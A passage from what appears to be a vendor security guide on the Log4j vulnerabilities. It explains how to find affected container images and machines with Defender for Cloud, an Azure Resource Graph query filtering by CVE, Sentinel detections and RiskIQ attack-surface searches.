Log4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR archive (up to one level of nesting).

We will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.

**Finding affected images**

To find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal.
Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs.

_Figure 11. Finding images with the CVE-2021-45046 vulnerability_

**Find vulnerable running images on Azure portal [preview]**

To view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs:

_Figure 12. Finding running images with the CVE-2021-45046 vulnerability_

Note: This recommendation requires clusters to run the Microsoft Defender security profile to provide visibility on running images.

**Search Azure Resource Graph data**

Azure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.

The following query finds resources affected by the Log4j vulnerability across subscriptions.
Use the additional data field across all returned results to obtain details on vulnerable resources:

    securityresources
    | where type =~ "microsoft.security/assessments/subassessments"
    | extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id), subAssessmentId=tostring(properties.id), parentResourceId=extract("(.+)/providers/Microsoft.Security", 1, id)
    | extend Props = parse_json(properties)
    | extend additionalData = Props.additionalData
    | extend cves = additionalData.cve
    | where isnotempty(cves) and array_length(cves) > 0
    | mv-expand cves
    | where tostring(cves) has "CVE-2021-44228" or tostring(cves) has "CVE-2021-45046" or tostring(cves) has "CVE-2021-45105"

### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:

* [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)

This query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>

### RiskIQ EASM and Threat Intelligence

RiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one, with links to previous articles, can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet.
For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you.

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note: you must be registered with a corporate email, and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab.

## Detecting and responding to exploitation attempts and other related attacker activity

### Microsoft 365 Defender

Microsoft 365 Defender co